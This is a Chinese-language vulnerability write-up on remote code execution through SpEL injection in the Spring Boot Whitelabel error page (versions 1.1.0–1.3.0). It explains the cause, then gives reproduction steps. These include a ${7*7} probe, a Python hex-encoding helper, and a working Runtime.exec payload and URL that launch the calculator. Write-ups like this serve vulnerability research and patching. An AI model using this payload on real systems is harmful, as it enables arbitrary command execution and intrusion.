Spring Boot whitelabel error page SpEL rce

一、漏洞简介

利用条件

• 至少知道一个触发 springboot 默认错误页面的接口及参数名

二、漏洞影响

spring boot 1.1.0-1.1.12、1.2.0-1.2.7、1.3.0

三、复现过程

漏洞原理：

1. spring boot 处理参数值出错，流程进入 org.springframework.util.PropertyPlaceholderHelper 类中
2. 此时 URL 中的参数值会用 parseStringValue 方法进行递归解析
3. 其中 ${} 包围的内容都会被 org.springframework.boot.autoconfigure.web.ErrorMvcAutoConfiguration 类的 resolvePlaceholder 方法当作 SpEL 表达式被解析执行，造成 RCE 漏洞

漏洞复现

步骤一：找到一个正常传参处

比如发现访问 /article?id=xxx ，页面会报状态码为 500 的错误： Whitelabel Error Page，则后续 payload 都将会在参数 id 处尝试。

步骤二：执行 SpEL 表达式

输入 /article?id=${7*7} ，如果发现报错页面将 7*7 的值 49 计算出来显示在报错页面上，那么基本可以确定目标存在 SpEL 表达式注入漏洞。

由字符串格式转换成 0x** java 字节形式，方便执行任意代码：

# coding: utf-8

result = ""
target = 'open -a Calculator'
for x in target:
    result += hex(ord(x)) + ","
print(result.rstrip(','))

执行 open -a Calculator 命令

${T(java.lang.Runtime).getRuntime().exec(new String(new byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}

正常访问：

http://www.0-sec.org:9091/article?id=66

执行 open -a Calculator 命令：

http://www.0-sec.org:9091/article?id=${T(java.lang.Runtime).getRuntime().exec(new%20String(new%20byte[]{0x6f,0x70,0x65,0x6e,0x20,0x2d,0x61,0x20,0x43,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72}))}